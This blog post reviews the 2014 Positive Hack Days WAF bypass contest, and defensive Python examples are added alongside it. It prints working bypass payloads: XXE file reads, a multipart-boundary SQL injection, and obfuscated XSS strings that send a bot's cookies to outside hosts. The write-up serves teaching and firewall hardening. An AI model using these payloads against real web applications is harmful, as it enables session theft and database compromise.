Monday, July 14, 2014

Review of WAF Bypass Tasks

This year, visitors of the Positive Hack Days forum were invited to try bypassing the PT Application Firewall in a contest called WAF Bypass. It was a good opportunity for us to test our product in action, because the forum gathers the best information security experts. We had prepared a set of tasks for the contest, each a script with a typical vulnerability.

The participants were invited to use these vulnerabilities to get flags. All tasks were solvable, though some solutions were not obvious. The contestants were also given a report from scanning the tasks' source code with another Positive Technologies product, Application Inspector. In this article, we consider the contest tasks, the bypass methods, and the experience we gained.


1. XXE

The first task was a PHP-based XMLRPC server vulnerable to XML External Entity (XXE) injection. Here is the vulnerability as detected by Application Inspector:


This task was a warm-up, and the Application Firewall was configured to block only the simple form of XXE:

<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input>

For example, a participant could obtain the flag using parameter entities:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "flag" >
%xxe;
]>
<body>
<method a='a'>test</method>
</body>

Another way was through the DOCTYPE declaration itself:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE body SYSTEM "flag">
<body><method>test</method></body>
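A defender's counterpart to the three payloads above, added here as an example (my code, not the contest's or the PT Application Firewall's): a parser that refuses any DOCTYPE at all, rather than matching the `<!ENTITY ... SYSTEM` pattern the warm-up rule looked for. The parameter-entity variant and the `DOCTYPE ... SYSTEM` variant both depend on a DTD being declared, so rejecting the DTD as a whole covers all three. The expat handler names are the standard library's; the sample documents are the page's payloads plus one constructed clean request.

```python
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when a document declares any DTD, internal or external."""


def parse_without_dtd(doc: bytes) -> str:
    """Parse `doc` and return its root element name, refusing any DOCTYPE.

    Blocking on the presence of a DOCTYPE instead of on an '<!ENTITY ... SYSTEM'
    pattern covers parameter entities (<!ENTITY % ...>) and an external subset
    (<!DOCTYPE ... SYSTEM "...">) alike, because every variant needs a DTD.
    """
    parser = expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Called as soon as '<!DOCTYPE' is seen, before any entity is resolved.
        raise DtdRejected(f"DOCTYPE {name!r} not allowed (system id {sysid!r})")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(doc, True)  # an exception raised in a handler aborts parsing and propagates
    return root[0]


def is_safe_xml(doc: bytes) -> bool:
    """True only for well-formed XML that declares no DTD at all."""
    try:
        parse_without_dtd(doc)
        return True
    except (DtdRejected, expat.ExpatError):
        return False


# The three XXE variants from the write-up, plus a constructed clean request.
SIMPLE_XXE = (b'<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
              b'<input>&xxe;</input>')
PARAM_ENTITY_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                    b'<!DOCTYPE foo [\n<!ELEMENT foo ANY >\n'
                    b'<!ENTITY % xxe SYSTEM "flag" >\n%xxe;\n]>\n'
                    b"<body>\n<method a='a'>test</method>\n</body>")
DOCTYPE_SYSTEM_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                      b'<!DOCTYPE body SYSTEM "flag">\n'
                      b'<body><method>test</method></body>')
CLEAN = b'<?xml version="1.0" encoding="UTF-8"?><body><method>test</method></body>'

if __name__ == "__main__":
    for label, doc in [("simple", SIMPLE_XXE), ("parameter entity", PARAM_ENTITY_XXE),
                       ("external subset", DOCTYPE_SYSTEM_XXE), ("clean", CLEAN)]:
        print(f"{label:16s} -> {'accepted' if is_safe_xml(doc) else 'rejected'}")
```

The check fires on the DOCTYPE token itself, so no entity, internal or external, is ever expanded; an XMLRPC endpoint has no legitimate need for a DTD, which is what makes the blanket refusal safe to deploy.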

2. SQL Injection

In this task, the goal was to obtain the flag from the database using SQL injection. Most contestants tried to bypass the filter instead of paying attention to the hint: it was necessary to find a weakness in the WAF configuration, namely improper data normalization. In fact, data normalization is among the most serious problems of modern WAFs: an improper implementation gives attackers protocol-level ways of bypassing the firewall. As Stefan Esser noted in his presentation Shocking News in PHP Exploitation as far back as 2009, WAF developers try to create a general HTTP parser for all existing implementations, which is obviously impossible. The approach taken in the PT Application Firewall is to normalize data with the back end's peculiarities in mind. In the task, normalization was disabled, which made the following bypass possible:

POST /news.php HTTP/1.1
Host: task2.waf-bypass.phdays.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=------,xxxx
Content-Length: 191

------,xxxx
Content-Disposition: form-data; name="img"; filename="img.gif"

GIF89a
------
Content-Disposition: form-data; name="id"

1' union select null,null,flag,null from flag limit 1 offset 1-- -
--------
------,xxxx--

PHP has its own multipart parser, which takes the part of the Content-Type boundary value before the comma as the boundary, whereas standard parsers take the entire string. Without proper normalization, the WAF therefore sees only a file upload and does not inspect the parameter, while PHP sees a regular parameter instead of the file input, and the payload is delivered.
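The normalization gap described above, as an added example (my own model, not the PT Application Firewall's normalizer and not PHP's actual parser): one simplified line-oriented multipart parser run twice, once with the boundary a generic HTTP parser derives from the Content-Type header and once with the boundary cut at the first comma, the PHP behaviour the paragraph describes. The request body, its dash counts and the placeholder `id` value are constructed for the example; delimiter lines are matched by prefix, which is an assumption about lenient parsers rather than a property of any named implementation. A WAF that normalizes the way the back end parses sees the `id` field; one that uses the generic boundary sees only a file part.

```python
import re


def boundary_generic(content_type: str) -> str:
    """Whole boundary parameter, as an RFC 2046-style parser reads it."""
    m = re.search(r'boundary=(?:"([^"]*)"|([^;]+))', content_type)
    if not m:
        raise ValueError("no boundary parameter")
    return (m.group(1) if m.group(1) is not None else m.group(2)).strip()


def boundary_php_style(content_type: str) -> str:
    """Boundary as the write-up says PHP reads it: cut at the first comma (modelled, not PHP's code)."""
    return boundary_generic(content_type).split(",", 1)[0]


def _disposition_param(header: bytes, key: bytes):
    m = re.search(rb';\s*' + key + rb'="([^"]*)"', header)
    return m.group(1).decode() if m else None


def parse_multipart(body: bytes, boundary: str):
    """Simplified line-oriented multipart/form-data parser (constructed model).

    A line starting with '--' + boundary is a delimiter; a delimiter followed by
    '--' closes the body. Returns (fields, files), each keyed by part name.
    """
    delim = b"--" + boundary.encode()
    parts, current = [], None
    for line in body.split(b"\r\n"):
        if line.startswith(delim):
            if current is not None:
                parts.append(current)
            if line.startswith(delim + b"--"):
                break
            current = []
        elif current is not None:
            current.append(line)
    fields, files = {}, {}
    for part in parts:
        if b"" not in part:
            continue  # no blank line separating headers from data: not a usable part
        blank = part.index(b"")
        headers, data = part[:blank], b"\r\n".join(part[blank + 1:])
        disp = next((h for h in headers if h.lower().startswith(b"content-disposition:")), b"")
        name = _disposition_param(disp, b"name")
        filename = _disposition_param(disp, b"filename")
        if name is None:
            continue
        if filename is not None:
            files[name] = (filename, data)
        else:
            fields[name] = data
    return fields, files


def inspected_fields(content_type: str, body: bytes) -> dict:
    """Form fields a WAF would inspect under each boundary-extraction rule."""
    return {
        "generic": parse_multipart(body, boundary_generic(content_type))[0],
        "php": parse_multipart(body, boundary_php_style(content_type))[0],
    }


# Constructed request modelled on the write-up; the id value is a placeholder.
CONTENT_TYPE = "multipart/form-data; boundary=------,xxxx"
BODY = (b"--------,xxxx\r\n"
        b'Content-Disposition: form-data; name="img"; filename="img.gif"\r\n'
        b"\r\n"
        b"GIF89a\r\n"
        b"--------\r\n"
        b'Content-Disposition: form-data; name="id"\r\n'
        b"\r\n"
        b"id-value-to-inspect\r\n"
        b"--------\r\n"
        b"--------,xxxx--")

if __name__ == "__main__":
    for rule, fields in inspected_fields(CONTENT_TYPE, BODY).items():
        print(f"{rule:8s} boundary rule -> fields seen by the WAF: {fields}")
```

Under the generic rule the whole second part, `id` included, is swallowed into the body of the `img.gif` upload, which is exactly the blind spot the contest exploited; the practical lesson is that a WAF has to know which back end is behind it and mirror that parser's quirks.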

3. httpOnly

This one and all subsequent tasks were about client-side vulnerabilities. We built a bot with Selenium that held special cookies containing a flag; the goal was to steal those cookies.

HttpOnly is a cookie flag restricting access via non-HTTP means such as JavaScript (hence the task name).

Here is the vulnerable script code:

<h4>httpOnly bypass</h4>
<p>In this task you need to bypass httpOnly and steal bot cookies using
<a href="http://waf-bypass.phdays.com/#bot">http://waf-bypass.phdays.com/#bot</a>.
All XSS checks are disabled, but there is an intentional bug, try to find it!</p>

<?php

if(!isset($_GET['name'])) die("<p>Please provide name</p>");

// Only the bot (requesting from localhost) gets the real flag in its cookie;
// everyone else gets a random value. The user-supplied name is prepended as is.
if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
  setcookie('flag', $_GET['name'] . '-' . file_get_contents('./flag'));
} else {
  setcookie('flag', $_GET['name'] . '-' . md5(mt_rand()));
}

// The name is reflected into the response unescaped (the intended XSS).
echo '<p>' . $_GET['name'] . '</p>';

?>

Note two things: the user-supplied value ends up in the cookie value, and the input is reflected into the response body as is. If the bot simply follows a link with XSS, it will not leak its cookies, because the Application Firewall sets the httpOnly flag. To bypass this mechanism, it was enough to put the string "httpOnly" into the cookie value: the WAF then decided that the flag had already been set and did not add another one.

httponly.php?name=<script>document.location.href='http://sniffer.com?'%2bdocument.cookie</script>;HttpOnly
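The configuration weakness behind this task, as an added example (my code, not the contest's or the product's): a substring check for "httpOnly" against the whole Set-Cookie header, beside an attribute-aware check that only looks at the `;`-separated attributes after the cookie pair. The sample headers are constructed; the first mimics what PHP's setcookie() emits when the name parameter ends in `;HttpOnly`, with the `;` percent-encoded, so the text "HttpOnly" sits inside the value rather than forming an attribute.

```python
def has_httponly_substring(set_cookie: str) -> bool:
    """The weak check: any occurrence of 'httponly' anywhere in the header counts."""
    return "httponly" in set_cookie.lower()


def cookie_attributes(set_cookie: str) -> list:
    """Attribute names from a Set-Cookie header, RFC 6265 style: everything after
    the first ';' is attributes, each 'name' or 'name=value'."""
    _, _, attrs = set_cookie.partition(";")
    return [a.strip().split("=", 1)[0].strip().lower()
            for a in attrs.split(";") if a.strip()]


def has_httponly_attribute(set_cookie: str) -> bool:
    """The structural check: HttpOnly must appear as an attribute, not inside the cookie value."""
    return "httponly" in cookie_attributes(set_cookie)


def enforce_httponly(set_cookie: str) -> str:
    """What the WAF should do on the response path: append '; HttpOnly' unless it is
    already present as an attribute."""
    if has_httponly_attribute(set_cookie):
        return set_cookie
    return set_cookie.rstrip().rstrip(";") + "; HttpOnly"


# Constructed headers. SMUGGLED_TEXT mimics setcookie('flag', $name . '-' . ...) when
# $name ends in ';HttpOnly': PHP percent-encodes the value, so ';' becomes %3B.
SMUGGLED_TEXT = "flag=x%3BHttpOnly-0123456789abcdef"
PLAIN = "flag=abc-0123456789abcdef; Path=/"
ALREADY_FLAGGED = "session=abc; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    for header in (SMUGGLED_TEXT, PLAIN, ALREADY_FLAGGED):
        print(f"{header}\n  substring says flagged: {has_httponly_substring(header)}"
              f"\n  attribute says flagged: {has_httponly_attribute(header)}"
              f"\n  enforced: {enforce_httponly(header)}")
```

The substring check is satisfied by the smuggled text and leaves the cookie unprotected; the attribute check is not, and `enforce_httponly` adds the flag. Parsing the header by its grammar rather than searching it is the whole fix.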

4. Anomaly

In this task, the contestants were invited to examine the anomaly detection mechanism, based on machine-learning algorithms, that the PT Application Firewall relies on. A statistical model had been trained on a very loose set of samples and so became overfit, that is, it considered too broad a range of values legitimate. The bypass method was to generate a string that fit the parameters of the trained statistical model. There was also a Cross-Site Scripting vulnerability here, but the httpOnly flag was not set. Even such a weakened statistical model was bypassed by only two contestants:

aaaaaaaaaaaa  ... [snip] ... aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav%3Cvideo+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+src=//secsem.ru+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+onerror=src%2b=document.cookie+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/%3E

It should be mentioned that, to "dilute" the special characters the WAF detects, the payload referred to the value of one tag attribute from another attribute, and the referenced attribute was placed far enough away for the string to stay below the threshold.
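A toy illustration of the "dilution" the paragraph describes, added here as an example; it is not the PT Application Firewall's model, whose features and threshold the write-up does not disclose. It scores a parameter value by the share of characters outside the alphanumeric set. Scored over the whole string, that share is driven down by padding, so a dense fragment wrapped in enough filler passes; scored as the maximum share over a fixed-width sliding window, the same padding changes nothing, because the dense stretch is still there. The samples, the window width and the threshold are constructed.

```python
import string

ALLOWED = set(string.ascii_letters + string.digits)
THRESHOLD = 0.05   # constructed; values scoring above it are flagged as anomalous
WINDOW = 32        # constructed window width in characters


def special_ratio(value: str) -> float:
    """Share of characters outside [A-Za-z0-9] over the whole value."""
    if not value:
        return 0.0
    return sum(ch not in ALLOWED for ch in value) / len(value)


def windowed_special_ratio(value: str, width: int = WINDOW) -> float:
    """Maximum share of non-alphanumeric characters over any `width`-character window.

    Padding outside the dense stretch cannot lower this score, because the window
    that sits on the dense stretch sees the same characters either way.
    """
    if len(value) <= width:
        return special_ratio(value)
    flags = [0 if ch in ALLOWED else 1 for ch in value]
    running = sum(flags[:width])
    best = running
    for i in range(width, len(value)):          # slide the window one character at a time
        running += flags[i] - flags[i - width]
        best = max(best, running)
    return best / width


def is_anomalous_global(value: str) -> bool:
    return special_ratio(value) > THRESHOLD


def is_anomalous_windowed(value: str) -> bool:
    return windowed_special_ratio(value) > THRESHOLD


# Constructed samples: a benign value, a dense markup-like fragment, and that fragment padded.
BENIGN = "johnsmith1984"
DENSE = "<x y=//h z=1>"                       # stand-in fragment, not a working payload
PADDED = "a" * 1000 + DENSE + "a" * 1000

if __name__ == "__main__":
    for label, value in [("benign", BENIGN), ("dense", DENSE), ("padded", PADDED)]:
        print(f"{label:7s} global={special_ratio(value):.3f} "
              f"windowed={windowed_special_ratio(value):.3f} "
              f"flagged(global)={is_anomalous_global(value)} "
              f"flagged(windowed)={is_anomalous_windowed(value)}")
```

The defender's takeaway is about feature design: any statistic normalized by total length can be pushed under a threshold by adding harmless filler, so a model that only sees such features is "loose" in precisely the way the task demonstrates, regardless of how it was trained.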

5. RegEx

In this task, the goal was to bypass a filter that uses regular expressions and to steal the bot's cookie. Signatures based on regular expressions are the essential part of any traditional WAF. Here we saw once more that a good WAF should not rely on regexps alone. Some bypass methods are given below:

<img src = http://dsec.ru/bitrix/templates/dsec/img/logo.png onload = \"\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.write('<im\\u0067 src = http://sergeybelove.ru?ccc='%2b\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.cooki\\u0065%2b'>')\">

1%3Cvideo%20%20src%3dx%20onerror%3d%0Asrc='ht'%2b'tp:'%2b'//'+d\\u006fcument['\\x63ookie']%3E%3C/video%3E

<svg onload=\"var xStuff=HTMLElement['con'%2b'structor'],yStuff=xStuff('var img=new'%2b' Ima'%2b'ge('%2b') ;im'%2b'g.sr'%2b'c=\\'http:/'%2b'/labs.tom.vg/cookie=\\'%2bdoc'%2b'ument.coo'%2b'kie;doc'%2b'ument.doc'%2b'umentEl'%2b'ement.appe'%2b'ndCh'%2b'ild'%2b'('%2b'img) ;'),zStuff=yStuff()\">
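The lesson of this task, as an added example (my code, not the product's signature engine): one signature matched against the raw parameter misses the escape-encoded forms, while the same signature applied after the value has been decoded to a fixpoint (URL encoding, HTML entities, JavaScript `\u` and `\x` escapes) catches them. The sample values are constructed in the spirit of the second bypass above; the last one, built by string concatenation, is deliberately not caught, which is the point the paragraph makes about not relying on regular expressions alone.

```python
import html
import re
from urllib.parse import unquote

# Signature for a cookie read, allowing dot and bracket notation.
SIGNATURE = re.compile(r"""document\s*(?:\.\s*cookie|\[\s*['"]cookie['"]\s*\])""", re.IGNORECASE)

_JS_ESCAPE = re.compile(r"\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2}))")


def decode_js_escapes(value: str) -> str:
    """Turn \\uXXXX and \\xXX escapes into the characters they stand for."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), value)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Apply URL, HTML-entity and JS-escape decoding until nothing changes (or max_rounds).

    Bounding the rounds keeps a pathological input from turning normalization into a CPU sink.
    """
    for _ in range(max_rounds):
        decoded = decode_js_escapes(html.unescape(unquote(value)))
        if decoded == value:
            return value
        value = decoded
    return value


def matches_raw(value: str) -> bool:
    return SIGNATURE.search(value) is not None


def matches_canonical(value: str) -> bool:
    return SIGNATURE.search(canonicalize(value)) is not None


# Constructed samples, each spelling the same cookie read a different way.
SAMPLES = {
    "plain":        "document.cookie",
    "js-escaped":   r"d\u006fcument['\x63ookie']",
    "url+js":       "d%5Cu006fcument%5B%27%5Cx63ookie%27%5D",
    "html-entity":  "d&#111;cument.c&#111;okie",
    "concatenated": "'doc'+'ument.coo'+'kie'",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:13s} raw={matches_raw(value)!s:5s} "
              f"canonical={matches_canonical(value)!s:5s} -> {canonicalize(value)}")
```

Decoding before matching closes the encoding tricks, but the concatenated form still slips through, and so would any construction that only exists once the browser evaluates the script. That is why a regex layer is useful for the cheap cases and insufficient on its own.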

6. Sanitize

In the last task, the contestants were invited to achieve XSS by bypassing a protection mechanism that encoded input values reflected in responses into HTML entities.

GET /sanitize.php?name=<script>alert(1)</script> HTTP/1.0

->

HTTP/1.0 200 OK
...
Hello, &lt;script&gt;alert(1)&lt;/script&gt;!

Such protection may seem perfect, but there was a way to bypass it. To find the value entered by the user, the WAF searches the entire HTTP response body, which can also contain other HTML tags. The bypass idea was to trick the WAF into escaping the tags already present in the response so that the target payload was not filtered.
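The fragility the paragraph points at, as an added example (my own model of the two approaches, not the product's sanitizer): a WAF-style filter that locates the user's value anywhere in the finished response and entity-encodes every occurrence, beside output encoding done by the application at the single point where the value is reflected. The template and inputs are constructed. When the input happens to coincide with markup the page legitimately contains, the response-side rewrite alters that markup too, while the application-side encoding touches only the reflected value; the contest bypass itself is not reproduced here.

```python
import html

# Constructed page template; the application reflects `name` inside the first paragraph.
TEMPLATE = "<html><body><p>Hello, {name}!</p><p>Welcome back.</p></body></html>"


def render_unsafe(name: str) -> str:
    """Application reflects the value as is (the vulnerable pattern from the task)."""
    return TEMPLATE.format(name=name)


def waf_escape_reflection(response: str, user_value: str) -> str:
    """Response-side sanitizer: find the submitted value anywhere in the body and
    entity-encode it. Modelled on the paragraph's description, not the product's code."""
    if not user_value:
        return response
    return response.replace(user_value, html.escape(user_value, quote=True))


def render_safe(name: str) -> str:
    """Application-side fix: encode at the point of reflection, so the template's
    own markup is never touched and the WAF has nothing to guess about."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def tag_count(document: str, tag: str) -> int:
    """Number of literal '<tag>' openings left in a document."""
    return document.count(f"<{tag}>")


if __name__ == "__main__":
    for value in ("<script>alert(1)</script>", "<p>"):
        rewritten = waf_escape_reflection(render_unsafe(value), value)
        print(f"input {value!r}:\n  WAF rewrite : {rewritten}\n  app encoding: {render_safe(value)}")
```

For the plain script tag both approaches produce the same response, which is why the protection looks perfect at first. For an input that collides with the page's own `<p>` tags, the response-side rewrite encodes the legitimate tags as well, so the WAF is now rewriting markup it did not receive from the user, while the application-side encoding leaves the template intact.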

Results

The winner was a Moscow State University team consisting of Georgiy Noseevich, Andrey Petukhov, and Alexander Razdobarov. They managed to solve all the tasks! Ivan Novikov (d0znpp) took second place and Tom Van Goethem, a speaker from Belgium, was third. All three medal places received valuable prizes: an Apple iPad Air, a Sony Xperia Z2, and an annual license for Burp Suite Pro, respectively.


A bit of statistics: during the two contest days, 122 644 requests were blocked, 101 contestants registered and only 11 of them managed to obtain at least one flag.

Day one dynamics


Day two dynamics


Statistics by attacks


Statistics by tasks


By the way, we made a cool visualization of the contest with logstalgia.



There we have it :)

Arseniy Reutov, Dmitriy Nagibin and PT Application Firewall Team
